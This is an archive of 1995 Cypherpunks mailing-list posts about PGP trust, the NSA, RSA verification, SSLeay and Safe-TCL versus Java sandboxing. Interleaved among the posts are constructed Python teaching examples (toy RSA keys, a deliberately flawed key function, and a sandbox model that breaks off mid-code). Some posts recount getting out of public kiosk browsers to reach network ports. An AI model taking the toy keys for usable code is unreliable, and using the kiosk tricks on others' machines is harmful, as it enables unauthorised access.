Date: Thu, 3 Aug 95 14:53:55 PDT
To: owner-cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <9508032153.AA23045@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> The emergence of NSA
>from absolutely secret agency to semi-public status (writing letters,
>P.R. concerns, opening a museum, etc.) at the same time as the general 
>availability of what's considered by many [including me] to be strong, 
>free, cryptography "for the masses" is interpreted by many [including me]
>as an implicit NSA comment on the availability of strong crypto in 
>general, and on the availability of PGP in particular.

Call me stupid, but what is the implicit comment?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 3 Aug 95 00:59:27 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <199508030758.RAA10894@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello Ray Cromwell <rjc@clark.net>, patl@lcs.mit.edu
  and tcmay@sensemedia.net (Timothy C. May)
  and cypherpunks@toad.com

> At 4:15 PM 8/1/95, Ray Cromwell wrote:
...
> >PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
>                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >provably correct.  To guard against trapdoors in PGP, you should
>  ^^^^^^^^^^^^^^^^^
...
[emphasis tcmay]

To which tcmay responded:

> This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
> necessity* make use of external library/utility functions? Such as the "dc"
> math routines for the PRNG? Part of its compactness is that it makes use of
> available libraries.
...

AFAIK (my 4 lines might differ from yours), there is no PRNG in the
4 lines of perl. The key is supplied as a parameter, and no guidance
to its generation is given in the implementation.

You are right about the dc, but it only uses that for modular exponentiation,
which is a lot easier to prove correct than PRNG.
Which is not to say that it *has* been proven.


I guess that makes me a nit-picker...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
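
Added example, not part of the post above and not the Perl program it discusses: textbook RSA in Python with the key passed in as a parameter, where the only arithmetic primitive is a square-and-multiply modular exponentiation that is checked against a plain specification. The function names and the toy key (p = 61, q = 53) are constructed for illustration.

```python
# Added illustration (not the Perl program, not PGP code). Textbook RSA with the
# key passed in as a parameter; the only arithmetic primitive is modular
# exponentiation, the job the post says is handed to dc.


def modexp(base, exp, mod):
    """Right-to-left square-and-multiply.

    Loop invariant: result * b**e == base**exp (mod mod).
    It holds on entry (result = 1, b = base, e = exp), each iteration
    preserves it, and at e == 0 it reads result == base**exp (mod mod).
    """
    if mod <= 0 or exp < 0:
        raise ValueError("need mod > 0 and exp >= 0")
    result, b, e = 1 % mod, base % mod, exp
    while e > 0:
        if e & 1:                  # low bit set: fold the current power in
            result = (result * b) % mod
        b = (b * b) % mod          # square for the next bit
        e >>= 1
    return result


def spec_modexp(base, exp, mod):
    """Specification by repeated multiplication: slow, but plainly right."""
    r = 1 % mod
    for _ in range(exp):
        r = (r * base) % mod
    return r


def spec_mismatches(limit=20):
    """Compare modexp with the specification on every small input."""
    bad = []
    for mod in range(1, limit):
        for base in range(limit):
            for exp in range(limit):
                if modexp(base, exp, mod) != spec_modexp(base, exp, mod):
                    bad.append((base, exp, mod))
    return bad


def rsa_apply(block, exponent, modulus):
    """Encrypt or decrypt one block: the whole cipher is a single modexp."""
    if not 0 <= block < modulus:
        raise ValueError("block must lie in [0, modulus)")
    return modexp(block, exponent, modulus)


def roundtrip_failures(n, e, d):
    """Count blocks m in [0, n) for which decrypt(encrypt(m)) != m."""
    return sum(1 for m in range(n) if rsa_apply(rsa_apply(m, e, n), d, n) != m)


# Constructed toy key: p = 61, q = 53, far too small for real use.
N, E, D = 61 * 53, 17, 2753        # 17 * 2753 == 1 (mod 60 * 52)

if __name__ == "__main__":
    print("mismatches vs. specification:", len(spec_mismatches()))
    c = rsa_apply(65, E, N)
    print("65 ->", c, "->", rsa_apply(c, D, N))
    print("round-trip failures, good key:", roundtrip_failures(N, E, D))
    # Nothing above can tell whether N was built from well-chosen random
    # primes; that depends on key generation, which sits outside this code.
    print("round-trip failures, wrong d:", roundtrip_failures(N, E, D + 1))
```

The exhaustive comparison and the loop invariant cover the exponentiation only; whether a supplied key is any good is a separate question that this code, like the four lines of Perl, never examines.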



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Thu, 3 Aug 95 17:03:51 PDT
To: sunder@escape.com (Ray Arachelian)
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.BSD/.3.91.950803121435.12078o-100000@escape.com>
Message-ID: <199508040003.SAA12916@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> // Ray, you may want to forward this to the list.
> 
> A TYPICAL DAILY PBS SCHEDULE IF THE PUBLIC BROADCASTING LEADERS CAVE IN
> TO REPUBLICAN PRESSURE
> 
> 8:00 am  Morning Stretch:  Arnold Schwarzenegger does squats while
> reciting passages of "Atlas Shrugged."
[bs deleted]
> 
> 

Why am I seeing this with the cp list?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 15:07:12 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508032204.SAA17985@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

On Thu, 3 Aug 1995, James Childers wrote:

>On Thu, 3 Aug 1995, Jim Ray wrote:
>
<snip>

>I'm afraid I don't follow. Are you saying that the NSA is assuming a more 
>public role because (apparently) strong crypto is now widely available to 
>the public?

yep. Sorry if I was unclear. Possibly even the recent Rosenberg
revelations are related, though they were reported in the media 
[in Miami at least] as coming from "the CIA" rather than from the
NSA. <sarcastic, unspoken, thoughts about "The Herald" here>

>I don't see the connection between A and B if this is what 
>you are claiming.

I do, but I am told I'm "paranoid." If I were running the NSA, I would
_NOT_ leave an obvious connection anyway, but those who know me say I'm
not exactly "NSA material."  ;-)

>
>Unless they're gearing up for a PR campaign...

Which is my theory. "They," for me, includes FBI director Freeh, whose
post OK City mass-murder paranoid anti-crypto comments I saw on C-SPAN. 
[Hence my PGP comment below.]

>I wonder how the NSA has 
>been portrayed in Hollywood in the past. I've just seen them mentioned in 
>one movie I can think about ("Crimson Tide"). Anyone else know of references?

Sorry, I'm almost movie-illiterate these days, but I do plan to see "the 
Net" soon, and I promise NOT to post my "review" unless I can add anything
meaningful to the previous ones, which is doubtful.<g>

>
>"Freedom is meaningless unless you can give to those with whom you 
>disagree." - Jefferson
<partial snip>
Agreed. "Liberty is like love, in that you can't have any until you give it
all away." [Unknown author, approx. quote]
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCFHgioZzwIn1bdtAQHcbwGAxhmZ8SCA9eF5WGGVNVOnudcqmkyHtrsn
inY/IoGrB8maPP4h/IdGzVrdddcOCkpH
=Gz8W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Thu, 3 Aug 95 16:42:11 PDT
To: danisch@ira.uka.de
Subject: Object Oriented Crypto API
In-Reply-To: <9508031542.AA03277@elysion.iaks.ira.uka.de>
Message-ID: <199508032337.AA13225@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 3 Aug 1995 17:42:29 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   X-Sun-Charset: US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   Good idea.

   I would have some suggestions, but first
   an important question:

   Is it to be discussed on the Cypherpunks list?

   Hadmut

He's right. There's nothing about aliens, Waco, or Whitewater.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@jpunix.com>
Date: Thu, 3 Aug 95 16:50:53 PDT
To: cypherpunks@toad.com
Subject: the Mix-L mailing list
Message-ID: <199508032350.SAA02475@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just discovered earlier this morning that in transitioning to a 
newer version of the FreeBSD OS, the majordomo code that runs the mix-l 
mailing list had become slightly broken. I'm not sure if subscription 
requests were being processed correctly. The list is fixed now. If you 
have tried to subscribe to mix-l in the past and have gotten no response, 
please try again.

send email to majordomo@jpunix.com with the BODY (not subject) of the 
message being:

subscribe mix-l

if you are interested in knowing about the goings-on with the development 
and operation of the Mixmaster remailer code.

- -- 
 John Perry - KG5RG - perry@jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 16:27:57 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508032325.TAA18780@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Rich Salz wrote:

<snip>


>Call me stupid, but what is the implicit comment?


I'm not sure, and I do not wish to speculate just now, with so many
people on this list who are so much better qualified to speculate
on the NSA's motivations than I am.

Perhaps my word "implicit" was poorly chosen. Anyway, going 
from silence to non-silence counts for _something_, and I doubt 
this kind of step was taken without high level thought or consultation
or infighting, considering the NSA's former near-monopoly on
strong cryptography capabilities.

<snip>

PS
I doubt *anyone* on this list is stupid, though all of us probably
do stupid things from time to time...  ;-)
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCFayCoZzwIn1bdtAQHXjgGArZLvrCRLpWOGf9CEwPJw+599uR/1UTir
kZBwiMrsg724XmEgTnpZYD6bvISv8Fdw
=X31m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Thu, 3 Aug 95 10:33:41 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
Message-ID: <v01510102ac458ef5a964@[193.74.217.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>How do I know PGP IS secure? I don't. That doesn't mean I don't use it or

Doesn't the NSA certify the security of cryptosystems?
I wonder what they'd say about PGP?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB/gUI4k1+54BopBAQEozAP/dTYfpk4aENquuhdmmAqWKFtHhcPFsj47
BL6F9QpA61eGaJ8T8hiuBlq9RBj8KYtQ0881CwLmiSztv1+uJxWWS11hb26l0zeD
tZ3I9JXgFJSC4Pkv2i84D5VbnFfL0W+7yWFsgJUgg++c9UUDVW7xcwSmUfVrqgE+
hVuFyCK/cDM=
=NXYL
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 3 Aug 95 17:53:53 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <Pine.BSD/.3.91.950803110646.12078E-100000@escape.com>
Message-ID: <9o809c19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@escape.com> writes:

> On Wed, 2 Aug 1995, Dr. Dimitri Vulis wrote:
> > terrible. The star should NOT have appeared in a bikini. Yech.
>
> Why not, she had the right 'assets' for that scene, no? 8-D

Tastes vary. If she were my friend, I'd recommend stuffing that bra. :) :) :)
(With something steganographic, of course. :)

> > In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
> > office and sets off a fire alarm. Everyone leaves, including a villaine, wh
> > doesn't log off.
>
> is this way.  Very few care about security.  Here at work I have to fight
> extra hard with idiots who log in and leave their machines -- users with
> Supervisory access!

I once was a consultant at a small financial services firm, and a (young,
disturbed) user was going around playing stupid pranks on unattended PCs. I
mandated the use of screenblankers that kicked in after 3 minutes of inactivity
and required a password to get back. The user would then reboot the PCs; some
password was needed to get onto the LAN, but he'd mess with the local
config.sys's. He eventually got fired and I do something else.

> > (One of the IP bytes was 344, by the way.)

> Re: ip #'s: Yeah, it's like all the phone numbers in every movie are
> 555-xxxx.  Probably they didn't want to get sued by posting a real net
> address and get sued.

I see! I remember reading that they discovered in the 30's that if they used a
real phone number in a movie, some people would actually dial it to see what it
is in real life, so all the phone numbers are in the nonexistent 555 exchange.
I guess if a valid IP number were used, some folks would ping it or something.
I guess byte values>255 are the IP equivalent of 555. Better than 127.0.0.1 -
someone might telnet to 127.0.0.1, then ask mgm/ua whose address this is. :)

> > "hot chats" on an her Mac, and hooks up the text to a voice synthesizer.
>
> can be telnetted into.  But the voice synths are possible.  Apple does
> provide that capability.  You'd have to get the irc client to use it.

My 6yr-old's IBM Aptiva comes with a sound board and the software that reads
English text and pronounces it in much more lifelike manner than the gizmo in
the movie. That gizmo sounded annoyingly computer-like, but had intonations
obviously coming from a human actor.

> it either.  It wasn't much of a "hot" chat.  It could have been much
> steamier.  The sex content of this movie was pretty lame though...

Hotter than any I've had in many, many years...
So, will they ever show some real X-rated hot chat in a real R-rated movie? :)

> > (If they all exchange so much e-mail, why do they bother FedExing diskettes
>
> More secure to fedex a disk.  Nobody on the net can read what's not on
> the net. ;-)  Now if the author of this movie knew about pgp... totally
> different story.

Better yet, if they were shown sending each other PGP-encrypted e-mail over the
Cypherpunks Anonymous Remailer Network... :) :) Maybe in the next movie.

> > (E-mailed from an open-access computer at a computer show, I might add)
>
> Not unlikely.  A lot of trade shows do provide machines with net access
> as demos of the internet.  Though it's usually manned by the ISP and not
> out in the open.

The notion is very realistic (but the flashy displays in the movie were not).
At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
running various Web browsers to try out. No one was watching over most of them.
I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
I (and the heroine) could have telnetted to someone's port 25 just as easily.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 3 Aug 95 17:49:03 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <v01510102ac458ef5a964@[193.74.217.2]>
Message-ID: <m0seAr9-001f8YC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Andrew Spring wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> >How do I know PGP IS secure? I don't. That doesn't mean I don't use it or
> 
> Doesn't the NSA certify the security of cryptosystems?
> I wonder what they'd say about PGP?

Hmm, I wonder if they have done such a certification and if an FOIA could 
elicit a response.



-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 3 Aug 95 17:54:03 PDT
To: trei@process.com
Subject: Re: a hole in PGP
In-Reply-To: <9508032026.AA16303@toad.com>
Message-ID: <m0seAwA-001f8aC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Peter Trei wrote:

> What would you do if you could crack RSA?

> * Post the algorithm to the net [anonymously?].

I don't care about anonymous, I'd love to see RSA squirm and would want
them to know who did it.

> * Try to cut a deal with NSA

Nah, I want to see them scrambling to update their crypto and leave us
the hell alone.


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 3 Aug 95 20:45:35 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: a hole in PGP
Message-ID: <8AE74C9.00030002C3.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DF> How is it "unscholarly, unprofessional, needlessly personal, and just
DF> plain insulting" to question the idea that hundreds of thousands of
DF> people are trusting their freedom to software that is probably not
                                                          ^^^^^^^^
  This is where you go too far. You have no basis for assigning such a
probability. While the incentives for releasing a crippled version are
there, the program has been subjected to intense scrutiny. As time goes
on, the failure to detect the kind of weaknesses you describe only
increases trust in the algorithms.

  But if you are paranoid, get a hold of one of the international
versions, use it to generate your keypairs, and then use MIT PGP to
encrypt and decrypt your communications. Nobody can know what version
you are using to make keys.

  Hell, if you are seriously paranoid, get the source code for key
generation, and compile your own stand-alone keymaker. Post it to some
.binaries thing via a remailer, and be happy that you foiled the
dastardly plot. And send a copy to me, while you're at it. With source.
I can compile my own from it that way.

  [Uh-oh. Sounds like "C'punks write code...."]



 * 
Everyone should have a cause.
I have a cause.
It's smut.








I'm for it
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Thu, 3 Aug 95 15:42:08 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508011956.MAA01495@comsec.com>
Message-ID: <199508032138.VAA00125@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


> But in which framework or language, given the profusion of frameworks and
> languages?
> 
> We had some TCL advocates a while back (Strick, Hal...)...any reaction to Java?

TCL solved my specific problem at that time.  Unfortunately I haven't
studied Java.  PM's comments (as usual) intrigue and bother me; I
need to study it.

TCL's biggest problem is that it's slow -- it's designed to be used
in the parts where speed doesn't really matter -- and it sounds
like Java solves that.


Perry -- do you have the same basic objection to Safe-TCL that you
do to Java?  I would think so.

 
			strick


> And so it goes.
> 
> --Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 3 Aug 95 19:52:43 PDT
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: "The Net"
In-Reply-To: <9o809c19w165w@bwalk.dm.com>
Message-ID: <WAA27310.199508040252@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9o809c19w165w@bwalk.dm.com>, Dr. Dimitri Vulis writes:
[...]
>The notion is very realistic (but the flashy displays in the movie were not).
>At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
>running various Web browsers to try out. No one was watching over most of them
>I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
>It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
>I (and the heroine) could have telnetted to someone's port 25 just as easily.

That's odd.  "uunet.uu.net" has had no A records for over a year.
Perhaps you mean "news.uu.net"?

At a recent the-net-is-hot-and-we-want-in show I appear to have
torqued off some sales drones 'cause I managed to get their Kosak-mode
web browser to give me a telnet.

They had left a "search the net" link on their pages (pointing to
Lycos or Info Seek - I don't remember which), and I used it to
locate one of my pages which has a "type the URL" field (it issues
a redirect).

I guess they didn't realise that if they give you a "global" search
box you can get anywhere as long as you remember enough of the text
on the page...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 3 Aug 95 22:50:13 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <WAA27310.199508040252@garotte.va.pubnix.com>
Message-ID: <PFHa0c4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Josh M. Osborne" <stripes@va.pubnix.com> writes:
> That's odd.  "uunet.uu.net" has had no A records for over a year.
> Perhaps you mean "news.uu.net"?

Yes, sorry.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 3 Aug 95 20:43:05 PDT
To: tcmay@sensemedia.net
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <9508040342.AA23479@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Perry -- do you have the same basic objection to Safe-TCL that you
>do to Java?  I would think so.

Safe-TCL comes from a different starting place.  For example, the original
intent was to actually remove all the dangerous operations such as
file manipulation.  As Perry's explained, this is different, and better,
than just having the run-time "guarantee" that all file I/O is in a
"Safe" place.

Claimer:  I invented safe-tcl, started by creating a mailing list with
Ousterhout and Borenstein.  Disclaimer:  I walked away in disgust with
the announcement of "enabled mail" so they may have broken things.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 23:40:51 PDT
To: cypherpunks@toad.com
Subject: RSA has been proved correct
Message-ID: <ac470d240502100447cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Serendipity strikes.

I was reading the logic programming/theorem proving chapter of my new
Russell and Norvig book on AI, and came across something I once knew about
but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
algorithm and the correctness of it was verified. Correctness in the sense
of showing that outputs match formal specs, for all inputs.

The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
public key encryption algorithm, "American Mathematical Monthly,"
91(3):181-189.

Now this does not mean:

- that implementations cannot have flaws, backdoors, etc.

- that larger systems which use RSA cannot have flaws, backdoors, etc.

What it says is that there is hope that formal verification of critical
modules is possible.

I can't imagine too many areas of software engineering that are more
critical to modularize and verify than crypto and digital money sorts of
things.

Huge monolithic programs are vastly more difficult--probably
intractable--to verify.

The "crypto library" project(s)--I use the plural because there have been
several such projects--are good ideas. Small modules that do one thing and
one thing only are best for building larger modules robustly.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."
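
The property described in the post above (outputs match the spec for all inputs), and the caveat that an implementation can still be flawed, shown as an added Python example that is not part of the original message and is not the Boyer-Moore proof. It checks a toy key exhaustively; the primes 61 and 53, the exponent 17 and the `buggy_key` flaw are constructed for illustration.

```python
from math import gcd


def make_key(p, q, e):
    """Textbook RSA key from two primes (toy sizes only)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    return n, e, pow(e, -1, phi)


def buggy_key(p, q, e):
    """Constructed implementation flaw: inverts e modulo n-1 instead of phi."""
    n = p * q
    return n, e, pow(e, -1, n - 1)


def check_spec(n, e, d):
    """Spec: for every m in [0, n), decrypt(encrypt(m)) == m.

    Returns the first counterexample, or None if the spec holds.
    """
    for m in range(n):
        if pow(pow(m, e, n), d, n) != m:
            return m
    return None


def shared_factor_messages(n):
    """Messages not coprime to n. Euler's theorem alone does not cover
    these, so a correctness argument has to handle them separately."""
    return [m for m in range(n) if gcd(m, n) != 1]


if __name__ == "__main__":
    n, e, d = make_key(61, 53, 17)
    print("correct key, counterexample:", check_spec(n, e, d))
    print("messages sharing a factor with n:", len(shared_factor_messages(n)))
    print("buggy key, counterexample:", check_spec(*buggy_key(61, 53, 17)))
```

An exhaustive check is only possible because the modulus is tiny; for real key sizes the same statement has to be proved, which is what the cited paper does for the algorithm but not for any particular implementation.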






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 3 Aug 95 21:55:54 PDT
To: enzo@ima.com (Enzo Michelangeli)
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <Pine.LNX.3.91.950804104356.9665A-100000@ima.net>
Message-ID: <199508040455.AAA18486@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Aug  3 23:45:04 1995: you scribbled...
> 
> On Thu, 3 Aug 1995, Jason Weisberger wrote:
> 
> > Maybe I miss it, but when did this arrive?  Is anyone testing it?
> 
> You may take a look at http://www.psy.uq.oz.au/~ftp/Crypto/
> 
> My initial enthusiasm has somewhat vanished when I've realized that a 
> free SSL implementation doesn't automatically allow to build a 
> Netsite-compatible server: without a certificate issued by Verisign on 
> behalf of Netscape Communications, Netscape Navigator won't talk to it.
> As SSL has some intrinsic points of weakness, I don't see the point
> of sticking to it to secure the TCP layer.

just wondering but...What are the intrinsic points of weakness?  

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 3 Aug 95 22:17:39 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9508040342.AA23479@sulphur.osf.org>
Message-ID: <199508040517.BAA05467@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Perry -- do you have the same basic objection to Safe-TCL that you
> >do to Java?  I would think so.
> 
> Safe-TCL comes from a different starting place.  For example, the original
> intent was to actually remove all the dangerous operations such as
> file manipulation.  As Perry's explained, this is different, and better,
> than just having the run-time "guarantee" that all file I/O is in a
> "Safe" place.

  Uh, no. There is no difference between this and Java. File I/O
operations can be added to any Safe-TCL restricted interpreter
via "declareharmless". The trusted and untrusted interpreters
don't run in separate process spaces, nor is it chrooted(). Perry's
criterion is that a failure can not result in the interpreter gaining
privileges it doesn't have. In Safe-TCL this is possible because there
is no protection between the trusted and untrusted interpreters. It's
possible that a bug could cause the interpreter to use an operating
system privilege the model clearly wasn't supposed to have.
(e.g., what if, by chance, the restricted and unrestricted interpreter
pointers get swapped or given to a function in reverse argument order
within an application? Kaboom, the safe-tcl script executes with full
privileges)

  This is much less secure than Java. First of all, there is no
"declareharmless" in Java. The only way to access any low-level
I/O in Java is via a class interface, and the "final" keyword on
the Java i/o classes prevent any subclasses from overriding these
methods. You can not tell the Java runtime to add a new privilege
to the interpreter like in Safe-TCL. The only way to extend Java is to
create "native" C-code methods and link them in.

  Java relies on its class loader and byte-code verifier to make sure
unauthorized code is attempting execution (such as overriding a system
method)

  It's not as secure as chroot() the Java runtime and running it in a 
separate process with only a pipe to communicate with the outside
O/S, but I feel it is a lot safer than Safe-Tcl. (not to denigrate
Safe-TCL, I am using it in a large project, but this is MHO)


  Finally, all you have to do to remove all I/O ability from Java is delete
the File I/O classes from the class hierarchy on your disk where HotJava
runs. Most apps don't use any File I/O anyway. (Java forces file i/o to
only be allowed in ~/.hotjava or wherever an environment variable
points) Java has no built in I/O primitives in the language itself.

-Ray
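
The two designs contrasted in the posts above (removing the dangerous commands versus guarding them at run time), together with the swapped-interpreter failure Ray describes, modelled as an added Python example that is not part of any message in this thread. `Interp`, `declare_harmless`, `deliver` and the other names are hypothetical and only model the idea; they are not the Safe-Tcl or Java API, and the files are constructed in a temporary directory.

```python
import os
import tempfile


class Interp:
    """Minimal command interpreter: a table mapping command name -> function."""

    def __init__(self, trusted, **commands):
        self.trusted = trusted
        self.commands = {"echo": lambda arg: arg, **commands}

    def eval(self, script):
        """Evaluate one 'command argument' pair per script line."""
        out = []
        for line in script.strip().splitlines():
            name, _, arg = line.strip().partition(" ")
            if name not in self.commands:
                raise NameError("no such command: " + name)
            out.append(self.commands[name](arg))
        return out


def read_file(path):
    with open(path) as fh:
        return fh.read()


def guarded_read(root):
    """Run-time guard: the command exists, but checks the path on every call."""
    root = os.path.realpath(root)

    def reader(path):
        real = os.path.realpath(path)  # resolves ".." and symlinks first
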